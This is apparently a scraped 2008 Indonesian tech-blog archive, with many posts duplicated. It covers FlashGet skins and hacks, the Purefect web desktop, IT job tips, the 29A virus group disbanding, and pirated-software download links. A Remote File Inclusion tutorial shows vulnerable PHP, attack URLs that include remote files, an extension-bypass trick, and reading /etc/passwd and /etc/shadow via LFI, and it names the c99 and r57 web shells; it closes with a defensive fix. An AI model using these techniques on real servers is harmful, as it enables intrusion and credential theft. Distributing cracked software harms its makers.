FlashGet Skins
Cat Sleep
Hawaii
Lightning Bolt 1
Lightning Bolt 2
Lion
Mercedes CLK
Mercedes E Class
Mountain
Porshe GT
Tiger
Water Yubo
Waterfall
Woods
Also include FlashGet Skin Designer
Tweaks
FlashGet 100 Max Download Jobs Hack
FlashGet Hack (Get Up To 30 Jets) v1.0
FlashGet v1.71 (Hack)
FlashGet v1.73 (Patch)
FlashGit v1.59
FlashGet (JetCar) v1.73 (Build 128)
FlashGet v1.90.1012
Screenshots:
http://i11.tinypic.com/4v509vt.jpg
http://i14.tinypic.com/6bb02tf.jpg
http://i12.tinypic.com/4mkessp.jpg
Downloads
http://www.megaupload.com/?d=WYEQ89R9
Kamis, 22 Mei 2008
Rabu, 21 Mei 2008
Terobosan Baru Dalam Sistem Aplikasi Web
Purefect adalah desktop environment yang berjalan 100% di atas web browser. Purefect mengadopsi teknologi RIA (Rich Internet Application). Dengan Purefect, aplikasi web tidak lagi berbentuk halaman-halaman web yang selama ini kita ketahui, tapi berbentuk aplikasi-aplikasi window seperti layaknya aplikasi yang berjalan pada komputer desktop kita.
Purefect berusaha untuk mengkombinasikan kelebihan dari sistem GUI pada desktop dengan kelebihan dari sistem web. Seluruh aplikasi dalam sistem Purefect berjalan di atas web browser dan dibangun dengan berbasiskan teknologi Web 2.0 dan AJAX (Asynchronous JavaScript and XML) yang akan mempermudah penggunaan dan pengaturan aplikasi.
Beberapa keuntungan dari Purefect adalah:
Mempermudah dan mempercepat pembangunan aplikasi web secara signifikan
Aplikasi yang dibangun bersifat multi-platform
Untuk menjalankan aplikasi berbasis Purefect yang dibutuhkan hanyalah web browser tanpa diperlukan plug-in atau software tambahan lainnya (ActiveX, Java, dsb)
Berbasis object oriented
Arsitektur lengkap: login system, personalized desktop, manajemen user, advanced windowing system, task management, dsb
Komponen-komponen dasar dari Purefect telah selesai dibangun. Fokus development saat ini adalah menambahkan berbagai komponen pendukung yang dapat mempermudah developer. Setelah komponen-komponen tersebut selesai, Klorofil akan segera merelease Purefect kepada komunitas open source.
Untuk melihat perkembangan terakhir development project Purefect tersebut, Anda dapat melihat screenshot dari Purefect di website Klorofil.
Purefect berusaha untuk mengkombinasikan kelebihan dari sistem GUI pada desktop dengan kelebihan dari sistem web. Seluruh aplikasi dalam sistem Purefect berjalan di atas web browser dan dibangun dengan berbasiskan teknologi Web 2.0 dan AJAX (Asynchronous JavaScript and XML) yang akan mempermudah penggunaan dan pengaturan aplikasi.
Beberapa keuntungan dari Purefect adalah:
Mempermudah dan mempercepat pembangunan aplikasi web secara signifikan
Aplikasi yang dibangun bersifat multi-platform
Untuk menjalankan aplikasi berbasis Purefect yang dibutuhkan hanyalah web browser tanpa diperlukan plug-in atau software tambahan lainnya (ActiveX, Java, dsb)
Berbasis object oriented
Arsitektur lengkap: login system, personalized desktop, manajemen user, advanced windowing system, task management, dsb
Komponen-komponen dasar dari Purefect telah selesai dibangun. Fokus development saat ini adalah menambahkan berbagai komponen pendukung yang dapat mempermudah developer. Setelah komponen-komponen tersebut selesai, Klorofil akan segera merelease Purefect kepada komunitas open source.
Untuk melihat perkembangan terakhir development project Purefect tersebut, Anda dapat melihat screenshot dari Purefect di website Klorofil.
IT Jobs for Indonesian 1st Graduate…
Jika kita mengecek lowongan IT yang disebar via milis, web job
recruitment, jasa ketenagakerjaan kampus ataupun di koran pasti banyak
mencantumkan syarat yang berat-berat seperti contoh iklan di bawah ini.
Padahal jujur aja, range gaji yang ditawarkan tidak sebanding dengan
ilmu yang dipunyai oleh calon karyawannya.
Untuk itu bagi rekan-rekan yang dari jurusan ybs (misalnya TIN, ITK, TEP
dan bahkan ILKOM) yang pengetahuan programmingnya sedikit, tetapi kuat
di logika pemrograman.
Kalimat² yang perlu dicermati dalam lowongan IT di antaranya:
” Menguasai bahasa pemrograman:
„ÏMicrosoft Visual Studio (Microsoft Visual Basic)
„ÏMicrosoft Visual Studio NET (Windows Application, ASP, Net..”
Untuk junior programming susah sekali dapat dikatakan bahwa mereka sudah
menguasai program VB.NET, di Jakarta sendiri ada beberapa Microsoft
certified Partner yang khusus menjual sertifikasi programmer dan itu
tidak murah.
“…5.Menguasai dan memahami SQL, Server, Oracle database…”
Sehingga jika ada perusahaan yang menawarkan lowongan seperti ini, kita
sudah dapat menebak bahwa perusahaan tersebut skalanya kecil (hanya
software house) dan kita akan diberi lot pekerjaan yang berat.
Strateginya, jangan berharap perusahaan tersebut memberi kita sallary
yang gede tetapi kita juga jangan terlalu fokus ke requirement mereka
yang sangat berat & njelimet.. (harus bisa SQL server tapi bisa Oracle
juga!!!)
Artinya: jika kita mau ngelamar ke perush. Tsb, PEDE AJAH! Gak usah
takut gak advance dalam pemrograman, toh ujung-ujungnya kita cuman
disuruh belajar oleh mereka.
Bagaimana strateginya agar diterima?
- cantumkan dalam CV Anda project apa saja yang sudah Anda kerjakan
walalupun itu proyek gratisan dan di bawah 1 juta rupiah. Misalnya saya
dulu pernah membuat dbase local pake Ms.Access di INDOFOOD. Bila perlu
program yang Anda buat tersebut di-Burn di CD lalu ditempeli sticker
logo ysb.
- tunjukkan bahwa Anda tekun dan suka begadang, di mana pun pekerja IT
itu hampir sama dengan sales, yaitu gak mengenal waktu kerja kantoran,
atau bahasa kerennya: “Longtime work hour”
Mungkin masih banyak yang dijadiin tips, tapi sebagai 1st graduate mah
jangan kebanyakan bertheory, kirim aja lowongan sebanyak-banyaknya ke
semua perusahaan. INGAT: bahwa lamaran adalah INVESTASI bagi orang yang
bekerja terutama di perusahaan swasta.
recruitment, jasa ketenagakerjaan kampus ataupun di koran pasti banyak
mencantumkan syarat yang berat-berat seperti contoh iklan di bawah ini.
Padahal jujur aja, range gaji yang ditawarkan tidak sebanding dengan
ilmu yang dipunyai oleh calon karyawannya.
Untuk itu bagi rekan-rekan yang dari jurusan ybs (misalnya TIN, ITK, TEP
dan bahkan ILKOM) yang pengetahuan programmingnya sedikit, tetapi kuat
di logika pemrograman.
Kalimat² yang perlu dicermati dalam lowongan IT di antaranya:
” Menguasai bahasa pemrograman:
„ÏMicrosoft Visual Studio (Microsoft Visual Basic)
„ÏMicrosoft Visual Studio NET (Windows Application, ASP, Net..”
Untuk junior programming susah sekali dapat dikatakan bahwa mereka sudah
menguasai program VB.NET, di Jakarta sendiri ada beberapa Microsoft
certified Partner yang khusus menjual sertifikasi programmer dan itu
tidak murah.
“…5.Menguasai dan memahami SQL, Server, Oracle database…”
Sehingga jika ada perusahaan yang menawarkan lowongan seperti ini, kita
sudah dapat menebak bahwa perusahaan tersebut skalanya kecil (hanya
software house) dan kita akan diberi lot pekerjaan yang berat.
Strateginya, jangan berharap perusahaan tersebut memberi kita sallary
yang gede tetapi kita juga jangan terlalu fokus ke requirement mereka
yang sangat berat & njelimet.. (harus bisa SQL server tapi bisa Oracle
juga!!!)
Artinya: jika kita mau ngelamar ke perush. Tsb, PEDE AJAH! Gak usah
takut gak advance dalam pemrograman, toh ujung-ujungnya kita cuman
disuruh belajar oleh mereka.
Bagaimana strateginya agar diterima?
- cantumkan dalam CV Anda project apa saja yang sudah Anda kerjakan
walalupun itu proyek gratisan dan di bawah 1 juta rupiah. Misalnya saya
dulu pernah membuat dbase local pake Ms.Access di INDOFOOD. Bila perlu
program yang Anda buat tersebut di-Burn di CD lalu ditempeli sticker
logo ysb.
- tunjukkan bahwa Anda tekun dan suka begadang, di mana pun pekerja IT
itu hampir sama dengan sales, yaitu gak mengenal waktu kerja kantoran,
atau bahasa kerennya: “Longtime work hour”
Mungkin masih banyak yang dijadiin tips, tapi sebagai 1st graduate mah
jangan kebanyakan bertheory, kirim aja lowongan sebanyak-banyaknya ke
semua perusahaan. INGAT: bahwa lamaran adalah INVESTASI bagi orang yang
bekerja terutama di perusahaan swasta.
Joke ? ROFL
We’ve been talking about several serious and frustating material(s) or information(s) in this blog lately; and I believe that most of it’s visitors are happy and enjoying their time reading these topics! It’s a fact that some serious infomation(s) in this blog is interesting; especially for IT people! But wait - According to BioWizard of the ScienceChatForum even Sexual Fantasies while doing Masturbation can damage your brain; why IT material(s) can’t?! Judging from that statement of the science guru, today I will try to put a little super funny joke(s) for you guys to watch! Have a look inside!
If you’re an Indonesian then you must know Indonesian Idol, and if you’re not Indonesian (and not coming from countries that apply Idol TV program) then you must know a little bit about American Idol and/or Asian Idol, right?! I hope you do, and if you don’t please refer to Google for that - Lawl!
Ok! This story is one of the most notable history of an Idol Selection(s) - Happened in Bulgarian Idol program(s)! Have a look here for the video~
Note: You really need to pay attention on it’s text and language(s) - More importantly, her statement at the very end of the video!
This “Ken Lee” person is actually having her very own fan’s site because of this video on YouTube.com; and perhaps her fan’s site is going to be a larger community compared to the real Idol of Bulgaria when the Idol is announced - Fabulous is it?! Hahaha.
For those who stayed in Indonesia and are using Indonesian ISP which still doing all the blocking thing(s) against YouTube.com - Please refer to my previous post to get to know how to bypass it, and do not forget to check on it’s very own comments! Cheers!
If you’re an Indonesian then you must know Indonesian Idol, and if you’re not Indonesian (and not coming from countries that apply Idol TV program) then you must know a little bit about American Idol and/or Asian Idol, right?! I hope you do, and if you don’t please refer to Google for that - Lawl!
Ok! This story is one of the most notable history of an Idol Selection(s) - Happened in Bulgarian Idol program(s)! Have a look here for the video~
Note: You really need to pay attention on it’s text and language(s) - More importantly, her statement at the very end of the video!
This “Ken Lee” person is actually having her very own fan’s site because of this video on YouTube.com; and perhaps her fan’s site is going to be a larger community compared to the real Idol of Bulgaria when the Idol is announced - Fabulous is it?! Hahaha.
For those who stayed in Indonesia and are using Indonesian ISP which still doing all the blocking thing(s) against YouTube.com - Please refer to my previous post to get to know how to bypass it, and do not forget to check on it’s very own comments! Cheers!
Selasa, 20 Mei 2008
The big G (Google) is too Powerfull
The Big G (Google) is currently the biggest search engine company on earth. The source here says the profit of the company itself keeps increasing. A big jump of 51% compared to 2006 and 14% compared to the last year. The numbers; their technology; their improvement on the search engine are the core factor that make the big G (Google) stays on the top of competition and currently dominating without any competitor.
Software Giant Company (Microsoft) understands that they also needs to grow, stays on the top of competition and try to compete with the big G. Source here says that Microsoft currently bids $44.6 billion for Yahoo; with an expectation that the merge of these 2 giant company can compete with the big G head-to-head in a matter of search engine.
Yahoo is still currently reviewing the offer; they have not come up with an answer yet. Some prediction of what might come next can be found here. Are they going to come up with a new name? Are they going to come up with a different layout on the internet? With a new domain name (microyohoo? yahoosoft? etc..)?
This is going to be interesting war
This article taken from ItLive Blog.
Software Giant Company (Microsoft) understands that they also needs to grow, stays on the top of competition and try to compete with the big G. Source here says that Microsoft currently bids $44.6 billion for Yahoo; with an expectation that the merge of these 2 giant company can compete with the big G head-to-head in a matter of search engine.
Yahoo is still currently reviewing the offer; they have not come up with an answer yet. Some prediction of what might come next can be found here. Are they going to come up with a new name? Are they going to come up with a different layout on the internet? With a new domain name (microyohoo? yahoosoft? etc..)?
This is going to be interesting war
This article taken from ItLive Blog.
Legendary Virus Programmer Group is No Longer Exist!
The legendary 29A virus programmer group is no more. According to a posting by long-time member Virusbuster on 29A’s web page there is no longer any contact between group members. Therefore, according to the posting the last remaining member decided to dissolve the group. Activities ceased in July 2007 when several members left the group and only three virus experts remained.
Anti-virus specialists assume that one reason for the group’s downfall is the now almost complete commercialisation of the malware scene, which has driven some virus authors into the arms of organised crime. Virus authors and botnet operators are increasingly being sent to prison for their activities, which doesn’t exactly make belonging to such a group more attractive - even if they are only amateurs like 29A.
29A’s demo viruses tended to be pioneering because they demonstrated the feasibility of viruses for various operating systems and technologies. The group, whose name is hexadecimal for 666, was responsible for the Cabir smart phone virus, early viruses for Windows 2000, for the 64-bit versions of Windows and for NTFS Alternate Data Streams, as well as Win32.Winux, a malware sample for Windows and Linux. Their malware never contained malicious routines and only demonstrated distribution methods and infection vectors. In its active period, the group published several online magazines with articles about virus programming. However, group member Marek “Benny” Strihavka, among others, did finish up in prison for one of the hacks.
Original Source - http://www.heise-online.co.uk/security/Legendary-virus-programmer-group-dissolved–/news/110277
Anti-virus specialists assume that one reason for the group’s downfall is the now almost complete commercialisation of the malware scene, which has driven some virus authors into the arms of organised crime. Virus authors and botnet operators are increasingly being sent to prison for their activities, which doesn’t exactly make belonging to such a group more attractive - even if they are only amateurs like 29A.
29A’s demo viruses tended to be pioneering because they demonstrated the feasibility of viruses for various operating systems and technologies. The group, whose name is hexadecimal for 666, was responsible for the Cabir smart phone virus, early viruses for Windows 2000, for the 64-bit versions of Windows and for NTFS Alternate Data Streams, as well as Win32.Winux, a malware sample for Windows and Linux. Their malware never contained malicious routines and only demonstrated distribution methods and infection vectors. In its active period, the group published several online magazines with articles about virus programming. However, group member Marek “Benny” Strihavka, among others, did finish up in prison for one of the hacks.
Original Source - http://www.heise-online.co.uk/security/Legendary-virus-programmer-group-dissolved–/news/110277
Remote File Inclusion
Remote File Inclusion, or, RFI, may sound hard, but it’s basically very easy. The title itself already explains a bit about it. You will basically include a file on a server, which is hosted on an other server. With RFI, you use an URL-based type of ‘hacking’. Of course, this will only be possible if the server supports PHP and allows Remote URL access.
Let’s make an example of a RFI. Say we have “server1.com” as vulnerable, and we have our file hosted on “server2.com”. Both server’s httpd root directories are “/var/www”. Server 1 has a vulnerability in their index.php. Server 2 contains our code which we want to include on Server 1
This is how a simple (and vulnerable) inclusion should look like, which we use as example on the index.php of Server 1:
$page = $_GET[’page’];
include($page);
?>
Now before we continue with RFI, and the file on Server 2, we will first test the code on the first server with LFI (Local File Inclusion), which is the same as RFI, only this method uses files which are hosted on the current (local) server, not a remote server. This method is often used in Linux to get “/etc/passwd” and sometimes “/etc/shadow”.
We will now create an other file on Server 1, which we will call “test.txt”. This file will only contain the following:
echo “Hello, this is a test.”;
?>
Now we can test our inclusion on Server 1. We will include “test.txt” to see if it’s working. An inclusion looks like “index.php?page=file”, since we use “$page” and “$_GET[’page’]”. so the URL will be:
http://server1.com/index.php?page=test.txt
If it works, you should see the text on the page, which will be:
Hello, this is a test.
If you did not create the test.txt, or if it’s just not there, you should see the following error:
Warning: main(test.txt) [function.main]: failed to open stream: No such file or directory in
/var/www/index.php on line 1
Remember that some servers have URL access disabled. This makes it impossible to include external (or Remote) files. This means you can not use “http://” or “ftp://” in an inclusion, but sometimes you can still use LFI on those websites.
Ok, so now we know that the inclusion works. We can now create our file on Server 2. Let’s call it “include.txt”. This file will contain the following:
echo “Your RFI seems to be working.”;
?>
Now you are ready to do your RFI. It looks like this:
http://server1.com/index.php?page=http://server2.com/include.txt
That is how your final URL should be. If it works, you’ll see the text of include.txt in the page of Server 1. Which will be:
Your RFI seems to be working.
Now there’s something you should remember, and that is that some websites already have a filetype configured in their include script, such as:
$page = $_GET[’page’];
include(”".$page.”.html”);
?>
Then if you use “index.php?page=test”, it will include “test.html” on the local server. If this is the case, then your “http://server2.com/include.txt” will not work. You can bypass this by placing a question mark after your own URL, so it will be “http://server2.com/include.txt?”. Then the URL should look like: http://server1.com/index.php?page=http://server2.com/include.txt?
What this will do is include “http://server2.com/include.txt?.html”, but because of your question mark, it will forget about “.html” and will just include your URL.
However, this is not all you can do with RFI. You can also include shell scripts, such as “c99″ and “r57″. These scripts will allow you to execute commands or do lots of other things on the server.
For my own websites, I also use inclusions, but I’ve blocked the ability to use RFI. Here’s a little bit of code which can help you on your way to secure your own pages:
$page = $_GET[’page’];
if ($page==”index”) {
$page = “home”;
}
$filename = “./” . $page .”.php”;
if (file_exists($filename)) {
include($filename);
} else {
include(’home.php’);
}
?>
This code will first check if the file which is requested, exists. If so, it includes it. If not, it will simply include home.php.
Let’s make an example of a RFI. Say we have “server1.com” as vulnerable, and we have our file hosted on “server2.com”. Both server’s httpd root directories are “/var/www”. Server 1 has a vulnerability in their index.php. Server 2 contains our code which we want to include on Server 1
This is how a simple (and vulnerable) inclusion should look like, which we use as example on the index.php of Server 1:
$page = $_GET[’page’];
include($page);
?>
Now before we continue with RFI, and the file on Server 2, we will first test the code on the first server with LFI (Local File Inclusion), which is the same as RFI, only this method uses files which are hosted on the current (local) server, not a remote server. This method is often used in Linux to get “/etc/passwd” and sometimes “/etc/shadow”.
We will now create an other file on Server 1, which we will call “test.txt”. This file will only contain the following:
echo “Hello, this is a test.”;
?>
Now we can test our inclusion on Server 1. We will include “test.txt” to see if it’s working. An inclusion looks like “index.php?page=file”, since we use “$page” and “$_GET[’page’]”. so the URL will be:
http://server1.com/index.php?page=test.txt
If it works, you should see the text on the page, which will be:
Hello, this is a test.
If you did not create the test.txt, or if it’s just not there, you should see the following error:
Warning: main(test.txt) [function.main]: failed to open stream: No such file or directory in
/var/www/index.php on line 1
Remember that some servers have URL access disabled. This makes it impossible to include external (or Remote) files. This means you can not use “http://” or “ftp://” in an inclusion, but sometimes you can still use LFI on those websites.
Ok, so now we know that the inclusion works. We can now create our file on Server 2. Let’s call it “include.txt”. This file will contain the following:
echo “Your RFI seems to be working.”;
?>
Now you are ready to do your RFI. It looks like this:
http://server1.com/index.php?page=http://server2.com/include.txt
That is how your final URL should be. If it works, you’ll see the text of include.txt in the page of Server 1. Which will be:
Your RFI seems to be working.
Now there’s something you should remember, and that is that some websites already have a filetype configured in their include script, such as:
$page = $_GET[’page’];
include(”".$page.”.html”);
?>
Then if you use “index.php?page=test”, it will include “test.html” on the local server. If this is the case, then your “http://server2.com/include.txt” will not work. You can bypass this by placing a question mark after your own URL, so it will be “http://server2.com/include.txt?”. Then the URL should look like: http://server1.com/index.php?page=http://server2.com/include.txt?
What this will do is include “http://server2.com/include.txt?.html”, but because of your question mark, it will forget about “.html” and will just include your URL.
However, this is not all you can do with RFI. You can also include shell scripts, such as “c99″ and “r57″. These scripts will allow you to execute commands or do lots of other things on the server.
For my own websites, I also use inclusions, but I’ve blocked the ability to use RFI. Here’s a little bit of code which can help you on your way to secure your own pages:
$page = $_GET[’page’];
if ($page==”index”) {
$page = “home”;
}
$filename = “./” . $page .”.php”;
if (file_exists($filename)) {
include($filename);
} else {
include(’home.php’);
}
?>
This code will first check if the file which is requested, exists. If so, it includes it. If not, it will simply include home.php.
Senin, 19 Mei 2008
Stardock Aquarium Desktop 2006 Elements Pack 1-3
Aquarium Desktop 2006 isn't a screen saver. It actually puts virtual fish and plants onto your desktop to swim around while you work.
Smoothly animated fish swim across your desktop in a life-like manner. Plants gently move to the current of the virtual water.
Add plants, anchors, debris, and even a treasure chest to your desktop. Options to configure type and quantity of fish, shadows, sounds, and more!
CPU-smart! Will not use CPU if fish are covered (it won't slow down your system).
It's just incredibly cool!
Download Link :
http://rapidshare.com/files/34791753/SAD.rar
Smoothly animated fish swim across your desktop in a life-like manner. Plants gently move to the current of the virtual water.
Add plants, anchors, debris, and even a treasure chest to your desktop. Options to configure type and quantity of fish, shadows, sounds, and more!
CPU-smart! Will not use CPU if fish are covered (it won't slow down your system).
It's just incredibly cool!
Download Link :
http://rapidshare.com/files/34791753/SAD.rar
Langganan:
Postingan (Atom)